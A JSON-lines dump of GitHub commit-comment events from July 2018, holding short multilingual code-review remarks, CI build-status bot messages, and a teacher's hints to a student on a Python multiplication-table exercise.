{"id":"7965569955","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29708794,"position":11,"line":10,"path":"BankManagement/BankManagement/Bank.c","commit_id":"bbba2d2e7a3c4020cc679e71dd960f60a6c1d65f","created_at":"2018-07-14T10:19:21Z","updated_at":"2018-07-14T10:19:21Z","author_association":"NONE","body":"good. follow this convention "}},"created_at":"2018-07-14T10:19:21Z"}
{"id":"7965570497","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708795,"position":131,"line":124,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:19:49Z","updated_at":"2018-07-14T10:19:49Z","author_association":"NONE","body":"весь блок `page-footer`\r\nа элементы почему то `footer__..`\r\n\r\nтогда либо переименуй  `page-footer` в просто  `footer`\r\nили все элементы приведи к виду  `page-footer__..`"}},"created_at":"2018-07-14T10:19:49Z"}
{"id":"7965572276","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708796,"position":134,"line":127,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:21:21Z","updated_at":"2018-07-14T10:21:21Z","author_association":"NONE","body":"часто выделяют в отдельный блок социальные кнопки\r\n\r\nто есть ты можешь добавить к `footer-social__list` дополнительный класс `social`  и сделать его отдельным блоком\r\nи все элементы внутри тоже переименовать в элементы `social__..`"}},"created_at":"2018-07-14T10:21:21Z"}
{"id":"7965572829","type":"CommitCommentEvent","actor":{"login":"Alys"},"repo":{"name":"HabitRPG/habitica-android"},"payload":{"comment":{"id":29708797,"position":24,"line":30,"path":"Habitica/src/main/java/com/habitrpg/android/habitica/ui/views/social/ChatBarView.kt","commit_id":"9e7ae94979cb54f7809b9d6deea349f15b4a4e81","created_at":"2018-07-14T10:21:52Z","updated_at":"2018-07-14T10:21:52Z","author_association":"NONE","body":"This should be 3000 rather than 200. https://github.com/HabitRPG/habitica-android/issues/993"}},"created_at":"2018-07-14T10:21:52Z"}
{"id":"7965581164","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29708810,"position":131,"line":124,"path":"source/index.html","commit_id":"fd1179f97c8accb26ebb1cc760e8c54b49e77159","created_at":"2018-07-14T10:29:29Z","updated_at":"2018-07-14T10:29:29Z","author_association":"NONE","body":"в хэдере у тебя кстати сделано правильно:\r\n\r\nблок `page-header`\r\nа элементы `page-header__..`"}},"created_at":"2018-07-14T10:29:29Z"}
{"id":"7965582521","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708815,"position":null,"line":null,"path":null,"commit_id":"814372513e0b5ca20e00518737f7c55dc7bf5dbf","created_at":"2018-07-14T10:30:39Z","updated_at":"2018-07-14T10:30:39Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T10:30:39Z"}
{"id":"7965582537","type":"CommitCommentEvent","actor":{"login":"AntyaDev"},"repo":{"name":"VIP-Logic/NBomber"},"payload":{"comment":{"id":29708816,"position":null,"line":null,"path":null,"commit_id":"1e26f2df65082f43d91768349841341da7ed4537","created_at":"2018-07-14T10:30:39Z","updated_at":"2018-07-14T10:30:39Z","author_association":"CONTRIBUTOR","body":"#23 "}},"created_at":"2018-07-14T10:30:39Z"}
{"id":"7965582883","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708818,"position":null,"line":null,"path":null,"commit_id":"4287e5040e1a5cf81b67347ef9aa6dba79d0112e","created_at":"2018-07-14T10:31:00Z","updated_at":"2018-07-14T10:31:00Z","author_association":"MEMBER","body":"#1108 #1113"}},"created_at":"2018-07-14T10:31:00Z"}
{"id":"7965583683","type":"CommitCommentEvent","actor":{"login":"revilovs"},"repo":{"name":"htw-exam-planner/exam-planner-app"},"payload":{"comment":{"id":29708819,"position":73,"line":73,"path":"src/main/java/admin/controllers/AdminAppointmentEntry.java","commit_id":"1d6fd8f392cf235d0587d0ea341b4371bf1ec750","created_at":"2018-07-14T10:31:42Z","updated_at":"2018-07-14T10:31:42Z","author_association":"CONTRIBUTOR","body":"Den sollte man doch in shared machen können"}},"created_at":"2018-07-14T10:31:42Z"}
{"id":"7965583867","type":"CommitCommentEvent","actor":{"login":"officialwedevgames"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29708820,"position":188,"line":23989,"path":"src/map/script.cpp","commit_id":"5b13dc7009e312585bba0ea55d77fc5afa8aecad","created_at":"2018-07-14T10:31:53Z","updated_at":"2018-07-14T10:31:53Z","author_association":"NONE","body":"Suggestion: Enable adding character id for card2 and 255 for card1 in able to generate signed items."}},"created_at":"2018-07-14T10:31:53Z"}
{"id":"7965586550","type":"CommitCommentEvent","actor":{"login":"1amjd1"},"repo":{"name":"julioverne/GoodWiFi"},"payload":{"comment":{"id":29708827,"position":84,"line":84,"path":"goodwifisettings/GoodWiFiSettingsController.mm","commit_id":"7e0c93a38d0d64364c3dd690229b8702311b6e4f","created_at":"2018-07-14T10:34:19Z","updated_at":"2018-07-14T10:34:19Z","author_association":"NONE","body":"Yes I’m "}},"created_at":"2018-07-14T10:34:19Z"}
{"id":"7965587560","type":"CommitCommentEvent","actor":{"login":"revilovs"},"repo":{"name":"htw-exam-planner/exam-planner-app"},"payload":{"comment":{"id":29708830,"position":22,"line":22,"path":"src/main/java/student/controllers/StudentAppointments.java","commit_id":"1d6fd8f392cf235d0587d0ea341b4371bf1ec750","created_at":"2018-07-14T10:35:20Z","updated_at":"2018-07-14T10:35:20Z","author_association":"CONTRIBUTOR","body":"Wozu kommt das in ne extra Methode?"}},"created_at":"2018-07-14T10:35:20Z"}
{"id":"7965588903","type":"CommitCommentEvent","actor":{"login":"DevWurm"},"repo":{"name":"htw-exam-planner/exam-planner-app"},"payload":{"comment":{"id":29708831,"position":22,"line":22,"path":"src/main/java/student/controllers/StudentAppointments.java","commit_id":"1d6fd8f392cf235d0587d0ea341b4371bf1ec750","created_at":"2018-07-14T10:36:37Z","updated_at":"2018-07-14T10:36:37Z","author_association":"CONTRIBUTOR","body":"Ist ne factory Methode. Die genaue Implementierung des Entry wird von den überschreibenden Klassen durch den Override festgelegt"}},"created_at":"2018-07-14T10:36:37Z"}
{"id":"7965589185","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29708832,"position":null,"line":null,"path":null,"commit_id":"4ad3a82a75436861b7a5fd0be57babd923d38356","created_at":"2018-07-14T10:36:53Z","updated_at":"2018-07-14T10:36:53Z","author_association":"NONE","body":"平敷くん\r\n\r\nお疲れ様です、金城です。\r\nいつも即座の返信ありがとうございます。自分の時間優先で大丈夫ですよ^^\r\n\r\n今回の課題結構難しいですね。自分で出しときながら、7/12の課題はいきなりレベル上げすぎたかなと感じています。\r\nそういう時は、今回みたいに遠慮なく声を上げてくださいね。\r\n\r\nこの講義は「プログラミングのスキル」を上げたい部分もありますが、それ以前に「組み立て方」を伝えられたらいいなとも思っています。\r\nというわけで、ヒント出してみますね。\r\n次のステップで段階的に組み立てていってください。不明な点があれば質問してくださいね。\r\n\r\n・このプログラムのメインの目的は「九九を計算する」ことです。まずは縦に羅列で構いませんので、1の段から順に、9の段まで計算結果を表示してください。掛ける数をx,掛けられる数をyとしてみてください。\r\nforステートメントを二重に使うやり方はfor-nest.pyが参考になると思います。\r\n実行した結果、\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n2\r\n4\r\n6\r\n8\r\n10\r\n(2の段の途中ですが中略。同じように9の段まで繰り返し出力)\r\n9\r\n18\r\n27\r\n36\r\n45\r\n54\r\n63\r\n72\r\n81\r\nと、出力される感じです。\r\n\r\n・これが出来たら、今度は上の結果が右寄せ表示になるようにしてみましょう。下記サンプルです。(アンダースコアは空白に読み替えてみてください)\r\n__1\r\n__2\r\n__3\r\n(中略)\r\n_63\r\n_72\r\n_81\r\n\r\n・ここまで出来たら1の段、2の段ごとに横に繋げて表示する方法を考えてみましょう。\r\n変数に繋げるやり方もありますし、教科書p.39上部のprint-end.pyのようにprintメソッドにて、end=\"\"を用いて改行させない方法もあります。\r\n\r\n・もうほぼ完成になったと思います。あとはサンプルの1,2行目と、3行目以降の\" 1|\"といった部分を繋げれば最終計です。\r\n\r\n参考にしてみてくださいね。"}},"created_at":"2018-07-14T10:36:53Z"}
{"id":"7965590441","type":"CommitCommentEvent","actor":{"login":"revilovs"},"repo":{"name":"htw-exam-planner/exam-planner-app"},"payload":{"comment":{"id":29708834,"position":22,"line":22,"path":"src/main/java/student/controllers/StudentAppointments.java","commit_id":"1d6fd8f392cf235d0587d0ea341b4371bf1ec750","created_at":"2018-07-14T10:38:06Z","updated_at":"2018-07-14T10:38:06Z","author_association":"CONTRIBUTOR","body":"Ok"}},"created_at":"2018-07-14T10:38:06Z"}
{"id":"7965590793","type":"CommitCommentEvent","actor":{"login":"albanoj2"},"repo":{"name":"albanoj2/robinhood-api"},"payload":{"comment":{"id":29708836,"position":null,"line":null,"path":null,"commit_id":"d90d8c5a68ec3d52d641faea01cc072a4e4c3826","created_at":"2018-07-14T10:38:24Z","updated_at":"2018-07-14T10:38:24Z","author_association":"OWNER","body":"@JonoAugustine Thank you. Sure, that would be great. I have to add some tests to make sure that my changes are stable, but I'd be glad to push these changes into the AMPro fork. I'll send you a pull request to add the changes to the AMPro repository once those tests are complete."}},"created_at":"2018-07-14T10:38:24Z"}
{"id":"7965591957","type":"CommitCommentEvent","actor":{"login":"akronek51"},"repo":{"name":"akronek51/boardgame_js"},"payload":{"comment":{"id":29708838,"position":15,"line":14,"path":"game.js","commit_id":"3170b5320227ed7a95b5b111f5912424d06e3ce3","created_at":"2018-07-14T10:39:37Z","updated_at":"2018-07-14T10:39:37Z","author_association":"OWNER","body":"Board.insertWalls"}},"created_at":"2018-07-14T10:39:37Z"}
{"id":"7965600334","type":"CommitCommentEvent","actor":{"login":"paulluger"},"repo":{"name":"TobiHatti/DA-WebSite-BadmintonOOE"},"payload":{"comment":{"id":29708851,"position":null,"line":null,"path":null,"commit_id":"69ab2a5831c230530d97c6bcabc5178633d07126","created_at":"2018-07-14T10:47:23Z","updated_at":"2018-07-14T10:47:23Z","author_association":"COLLABORATOR","body":"Footer"}},"created_at":"2018-07-14T10:47:23Z"}
{"id":"7965600384","type":"CommitCommentEvent","actor":{"login":"luigi055"},"repo":{"name":"luigi055/Webpack-tutorial"},"payload":{"comment":{"id":29708852,"position":null,"line":null,"path":null,"commit_id":"f1693d3100d528c94a59f1da39752d72988fea9f","created_at":"2018-07-14T10:47:26Z","updated_at":"2018-07-14T10:47:26Z","author_association":"OWNER","body":"Hey Carlos, disfrutalo tio, el tuto sigue en beta. Y aun faltan 3 u 4 modulos para completarlo ademas de la revisión final. Una vez este completo te notifico.  :)"}},"created_at":"2018-07-14T10:47:26Z"}
{"id":"7965603564","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708856,"position":null,"line":null,"path":null,"commit_id":"8c4bca527159d8c3143a67074fec39f7c8299d41","created_at":"2018-07-14T10:50:28Z","updated_at":"2018-07-14T10:50:28Z","author_association":"MEMBER","body":"When doing changes like this, don't forget to update https://github.com/freemint/travis-scripts/tree/freemint-master (I have done it)."}},"created_at":"2018-07-14T10:50:28Z"}
{"id":"7965606375","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29708864,"position":null,"line":null,"path":null,"commit_id":"4ad3a82a75436861b7a5fd0be57babd923d38356","created_at":"2018-07-14T10:53:08Z","updated_at":"2018-07-14T10:53:08Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中失礼致します。やり方教えて頂いてありがとうございます!やってみようと思います!!m(_ _)m  平敷大賀\r\n\r\n2018년 7월 14일 (토) 오후 7:36, kinjo-icolle <notifications@github.com>님이 작성:\r\n\r\n> 平敷くん\r\n>\r\n> お疲れ様です、金城です。\r\n> いつも即座の返信ありがとうございます。自分の時間優先で大丈夫ですよ^^\r\n>\r\n> 今回の課題結構難しいですね。自分で出しときながら、7/12の課題はいきなりレベル上げすぎたかなと感じています。\r\n> そういう時は、今回みたいに遠慮なく声を上げてくださいね。\r\n>\r\n> この講義は「プログラミングのスキル」を上げたい部分もありますが、それ以前に「組み立て方」を伝えられたらいいなとも思っています。\r\n> というわけで、ヒント出してみますね。\r\n> 次のステップで段階的に組み立てていってください。不明な点があれば質問してくださいね。\r\n>\r\n>\r\n> ・このプログラムのメインの目的は「九九を計算する」ことです。まずは縦に羅列で構いませんので、1の段から順に、9の段まで計算結果を表示してください。掛ける数をx,掛けられる数をyとしてみてください。\r\n> forステートメントを二重に使うやり方はfor-nest.pyが参考になると思います。\r\n> 実行した結果、\r\n> 1\r\n> 2\r\n> 3\r\n> 4\r\n> 5\r\n> 6\r\n> 7\r\n> 8\r\n> 9\r\n> 2\r\n> 4\r\n> 6\r\n> 8\r\n> 10\r\n> (2の段の途中ですが中略。同じように9の段まで繰り返し出力)\r\n> 9\r\n> 18\r\n> 27\r\n> 36\r\n> 45\r\n> 54\r\n> 63\r\n> 72\r\n> 81\r\n> と、出力される感じです。\r\n>\r\n> ・これが出来たら、今度は上の結果が右寄せ表示になるようにしてみましょう。下記サンプルです。(アンダースコアは空白に読み替えてみてください)\r\n> __1\r\n> __2\r\n> __3\r\n> (中略)\r\n> _63\r\n> _72\r\n> _81\r\n>\r\n> ・ここまで出来たら1の段、2の段ごとに横に繋げて表示する方法を考えてみましょう。\r\n> 変数に繋げるやり方もありますし、教科書p.39上部のprint-end.py\r\n> <http://p.xn--39print-end-6g4jt893ahwyj.py>\r\n> のようにprintメソッドにて、end=\"\"を用いて改行させない方法もあります。\r\n>\r\n> ・もうほぼ完成になったと思います。あとはサンプルの1,2行目と、3行目以降の\" 1|\"といった部分を繋げれば最終計です。\r\n>\r\n> 参考にしてみてくださいね。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/4ad3a82a75436861b7a5fd0be57babd923d38356#commitcomment-29708832>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf580_B3o-Vq5yTKKjqZgIYbWrgZsavks5uGcnGgaJpZM4VPySh>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-14T10:53:08Z"}
{"id":"7965607840","type":"CommitCommentEvent","actor":{"login":"Rechi"},"repo":{"name":"Lunatixz/KODI_Addons"},"payload":{"comment":{"id":29708866,"position":21,"line":53,"path":"script.kodi.windows.update/default.py","commit_id":"0f0e0ccbb1a123f0d6b49bb66ca50608a2371bac","created_at":"2018-07-14T10:54:30Z","updated_at":"2018-07-14T10:54:30Z","author_association":"NONE","body":"this wrong, as one can have installed desktop and uwp version at the same time"}},"created_at":"2018-07-14T10:54:30Z"}
{"id":"7965608953","type":"CommitCommentEvent","actor":{"login":"rosscourt"},"repo":{"name":"rosscourt/blueprint"},"payload":{"comment":{"id":29708867,"position":null,"line":null,"path":null,"commit_id":"b85ff38ca8c549ae984095c2ead735cf6abfca12","created_at":"2018-07-14T10:55:33Z","updated_at":"2018-07-14T10:55:33Z","author_association":"OWNER","body":"<h3>Added missing text css classnames to Classes module</h3>\n\nPreview: <strong><a href='https://29-135821600-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://29-135821600-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://29-135821600-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-14T10:55:33Z"}
{"id":"7965610247","type":"CommitCommentEvent","actor":{"login":"Mohammad-Zaboor"},"repo":{"name":"Mohammad-Zaboor/DemoApp"},"payload":{"comment":{"id":29708870,"position":null,"line":null,"path":null,"commit_id":"60a351693451fe31abac7f3da0c64298018697ae","created_at":"2018-07-14T10:56:48Z","updated_at":"2018-07-14T10:56:48Z","author_association":"OWNER","body":"new"}},"created_at":"2018-07-14T10:56:48Z"}
{"id":"7965613667","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29708883,"position":63,"line":53,"path":"contracts/Remittance.sol","commit_id":"f0ba5fbb23339abefb7975d5beee2f9dabd73ffc","created_at":"2018-07-14T11:00:14Z","updated_at":"2018-07-14T11:00:14Z","author_association":"OWNER","body":"The processed flag? Yes, at the `processPayment` and `claimPayment` functions, to ensure the funds are only transferred once."}},"created_at":"2018-07-14T11:00:14Z"}
{"id":"7965614513","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708889,"position":null,"line":null,"path":null,"commit_id":"9d82cbac690c82bd116fc37eb8c70506503f27bc","created_at":"2018-07-14T11:00:58Z","updated_at":"2018-07-14T11:00:58Z","author_association":"MEMBER","body":"Having https://github.com/freemint/lib/issues/6#issuecomment-404772094 in mind, what about migration this tool to the libgemma's repository, as a kind of example project?"}},"created_at":"2018-07-14T11:00:58Z"}
{"id":"7965616953","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708890,"position":null,"line":null,"path":null,"commit_id":"814372513e0b5ca20e00518737f7c55dc7bf5dbf","created_at":"2018-07-14T11:03:19Z","updated_at":"2018-07-14T11:03:19Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1688 of 1688 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-814372513e0b5ca20e00518737f7c55dc7bf5dbf-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-14T11:03:19Z"}
{"id":"7965618788","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708892,"position":null,"line":null,"path":null,"commit_id":"5fa766896bf409d00ae19f4c497f7cb36d1b0d09","created_at":"2018-07-14T11:05:11Z","updated_at":"2018-07-14T11:05:11Z","author_association":"MEMBER","body":"Why is this needed? I thought mintlib always supplies argv[0] ?"}},"created_at":"2018-07-14T11:05:11Z"}
{"id":"7965621834","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708895,"position":null,"line":null,"path":null,"commit_id":"5fa766896bf409d00ae19f4c497f7cb36d1b0d09","created_at":"2018-07-14T11:08:20Z","updated_at":"2018-07-14T11:08:20Z","author_association":"CONTRIBUTOR","body":"mintlib yes, but only if ARGV method is used, which the desktop sometimes does not use. In that case only the cmdline from the basepage is used, which does not contain the program name."}},"created_at":"2018-07-14T11:08:20Z"}
{"id":"7965623796","type":"CommitCommentEvent","actor":{"login":"Jackchows"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29708896,"position":12,"line":195,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-14T11:10:12Z","updated_at":"2018-07-14T11:10:12Z","author_association":"OWNER","body":"嗯，標反了。"}},"created_at":"2018-07-14T11:10:12Z"}
{"id":"7965625009","type":"CommitCommentEvent","actor":{"login":"FokinAlex"},"repo":{"name":"nikon-petr/simple-api"},"payload":{"comment":{"id":29708897,"position":24,"line":24,"path":"src/main/java/edu/nikon/simpleapi/api/user/domain/User.java","commit_id":"58c9bb9d66479336f093250f518a50e59c264a04","created_at":"2018-07-14T11:11:22Z","updated_at":"2018-07-14T11:11:22Z","author_association":"NONE","body":"Is it badpractice? Builder must be here :+1: "}},"created_at":"2018-07-14T11:11:22Z"}
{"id":"7965625631","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"AnnaLeticiaAlegria/ProjetoCeu"},"payload":{"comment":{"id":29708898,"position":279,"line":279,"path":"Relogio_em_Ceu/relogio.ceu","commit_id":"a189aab198d72ea7b424586fa5a78c326ed2987f","created_at":"2018-07-14T11:11:56Z","updated_at":"2018-07-14T11:11:56Z","author_association":"COLLABORATOR","body":"Pode usar o `else/if`"}},"created_at":"2018-07-14T11:11:56Z"}
{"id":"7965626101","type":"CommitCommentEvent","actor":{"login":"Jousenberg117"},"repo":{"name":"Jousenberg117/SpecFlow-FileServer"},"payload":{"comment":{"id":29708899,"position":null,"line":null,"path":null,"commit_id":"ad1d29b7b79391c397a33632b599da7d318703a7","created_at":"2018-07-14T11:12:24Z","updated_at":"2018-07-14T11:12:24Z","author_association":"OWNER","body":"Actualización."}},"created_at":"2018-07-14T11:12:24Z"}
{"id":"7965626291","type":"CommitCommentEvent","actor":{"login":"FokinAlex"},"repo":{"name":"nikon-petr/simple-api"},"payload":{"comment":{"id":29708900,"position":189,"line":189,"path":"src/main/java/edu/nikon/simpleapi/api/user/domain/User.java","commit_id":"58c9bb9d66479336f093250f518a50e59c264a04","created_at":"2018-07-14T11:12:36Z","updated_at":"2018-07-14T11:12:36Z","author_association":"NONE","body":"What the hell? "}},"created_at":"2018-07-14T11:12:36Z"}
{"id":"7965626346","type":"CommitCommentEvent","actor":{"login":"sunnyraj84348"},"repo":{"name":"LordShenron/Direwolf_xiaomi_msm8917"},"payload":{"comment":{"id":29708901,"position":null,"line":null,"path":null,"commit_id":"33ebd923c69c4fc6c63f564e924732df4f819075","created_at":"2018-07-14T11:12:39Z","updated_at":"2018-07-14T11:12:39Z","author_association":"NONE","body":"Lol"}},"created_at":"2018-07-14T11:12:39Z"}
{"id":"7965627167","type":"CommitCommentEvent","actor":{"login":"th-otto"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708905,"position":null,"line":null,"path":null,"commit_id":"9d82cbac690c82bd116fc37eb8c70506503f27bc","created_at":"2018-07-14T11:13:29Z","updated_at":"2018-07-14T11:13:29Z","author_association":"CONTRIBUTOR","body":"For the gem part, that would make sense. That would also make is unneccessary for Vincent to provide a debian package for it. But it also needs needs the mkfatfs source, which is also build as a commandline tool. "}},"created_at":"2018-07-14T11:13:29Z"}
{"id":"7965627838","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708906,"position":null,"line":null,"path":null,"commit_id":"1de789f142c240842378b903fa744d2f49da5e15","created_at":"2018-07-14T11:14:07Z","updated_at":"2018-07-14T11:14:07Z","author_association":"MEMBER","body":"When doing changes like this, don't forget to update https://github.com/freemint/travis-scripts/tree/freemint-master (I have done it)."}},"created_at":"2018-07-14T11:14:07Z"}
{"id":"7965627855","type":"CommitCommentEvent","actor":{"login":"griphon56"},"repo":{"name":"griphon56/septic78"},"payload":{"comment":{"id":29708907,"position":4,"line":29,"path":"View/Header/headerView.php","commit_id":"8e4cde62a60898d71633b38dc7a6016af63c830d","created_at":"2018-07-14T11:14:08Z","updated_at":"2018-07-14T11:14:08Z","author_association":"OWNER","body":"Картинку нужно вернуть."}},"created_at":"2018-07-14T11:14:08Z"}
{"id":"7965629048","type":"CommitCommentEvent","actor":{"login":"griphon56"},"repo":{"name":"griphon56/septic78"},"payload":{"comment":{"id":29708908,"position":5,"line":23,"path":"View/style/headerView.css","commit_id":"8e4cde62a60898d71633b38dc7a6016af63c830d","created_at":"2018-07-14T11:15:02Z","updated_at":"2018-07-14T11:15:02Z","author_association":"OWNER","body":"Зачем тут тогда вообще padding?)\r\nМожно удалить"}},"created_at":"2018-07-14T11:15:02Z"}
{"id":"7965629351","type":"CommitCommentEvent","actor":{"login":"sayakpaul"},"repo":{"name":"sayakpaul/Precise"},"payload":{"comment":{"id":29708911,"position":null,"line":null,"path":null,"commit_id":"3ed4bcd2104b3eabc931cf9c72cd6d2c7284c2cb","created_at":"2018-07-14T11:15:17Z","updated_at":"2018-07-14T11:15:17Z","author_association":"OWNER","body":"The tuning takes 1452 seconds to converge."}},"created_at":"2018-07-14T11:15:17Z"}
{"id":"7965630033","type":"CommitCommentEvent","actor":{"login":"griphon56"},"repo":{"name":"griphon56/septic78"},"payload":{"comment":{"id":29708915,"position":7,"line":25,"path":"View/style/headerView.css","commit_id":"8e4cde62a60898d71633b38dc7a6016af63c830d","created_at":"2018-07-14T11:15:54Z","updated_at":"2018-07-14T11:15:54Z","author_association":"OWNER","body":"16 думаю будет достаточно."}},"created_at":"2018-07-14T11:15:54Z"}
{"id":"7965630553","type":"CommitCommentEvent","actor":{"login":"griphon56"},"repo":{"name":"griphon56/septic78"},"payload":{"comment":{"id":29708918,"position":14,"line":31,"path":"View/style/headerView.css","commit_id":"8e4cde62a60898d71633b38dc7a6016af63c830d","created_at":"2018-07-14T11:16:22Z","updated_at":"2018-07-14T11:16:22Z","author_association":"OWNER","body":"аналогично, 16 достаточно"}},"created_at":"2018-07-14T11:16:22Z"}
{"id":"7965631888","type":"CommitCommentEvent","actor":{"login":"MeridianOXC"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29708919,"position":5,"line":354,"path":"src/Basescape/SoldierTransformationState.cpp","commit_id":"66168092e7f4587d23bc041ac54bb9df747b5b1c","created_at":"2018-07-14T11:17:35Z","updated_at":"2018-07-14T11:17:35Z","author_association":"NONE","body":"I used source soldier and moved the removal to a different place"}},"created_at":"2018-07-14T11:17:35Z"}
{"id":"7965632326","type":"CommitCommentEvent","actor":{"login":"mikrosk"},"repo":{"name":"freemint/freemint"},"payload":{"comment":{"id":29708920,"position":null,"line":null,"path":null,"commit_id":"9d82cbac690c82bd116fc37eb8c70506503f27bc","created_at":"2018-07-14T11:18:02Z","updated_at":"2018-07-14T11:18:02Z","author_association":"MEMBER","body":"Oh crap. I guess we can't getaway without @vinriviere's help it seems."}},"created_at":"2018-07-14T11:18:02Z"}
{"id":"7965632535","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708921,"position":null,"line":null,"path":null,"commit_id":"8b1e5a092fa43a51a252f62cd82ea6373d632421","created_at":"2018-07-14T11:18:14Z","updated_at":"2018-07-14T11:18:14Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (Unknown) - Win64-Windows-7-VisualStudio-14: OK (3316 of 3316 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b1e5a092fa43a51a252f62cd82ea6373d632421-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T11:18:14Z"}
{"id":"7965632794","type":"CommitCommentEvent","actor":{"login":"MeridianOXC"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29708922,"position":4,"line":299,"path":"src/Battlescape/UnitFallBState.cpp","commit_id":"9d9500787ce8ebd1a608569c22a00cc246621c69","created_at":"2018-07-14T11:18:29Z","updated_at":"2018-07-14T11:18:29Z","author_association":"NONE","body":"I cherry-picked Warboy's commit"}},"created_at":"2018-07-14T11:18:29Z"}
{"id":"7965633066","type":"CommitCommentEvent","actor":{"login":"nimesh7424"},"repo":{"name":"gicheonkang/fast-face-android"},"payload":{"comment":{"id":29708923,"position":null,"line":null,"path":null,"commit_id":"0786177bc144215dddfd0ffff112feec8b628cec","created_at":"2018-07-14T11:18:46Z","updated_at":"2018-07-14T11:18:46Z","author_association":"NONE","body":"I am developing a makeup app so I have cloned your project for reference and yes it helps me a lot but i want to ask you how to get landmarks for only lips and how can i fill color in those lip's landmarks(like LipStick)."}},"created_at":"2018-07-14T11:18:46Z"}
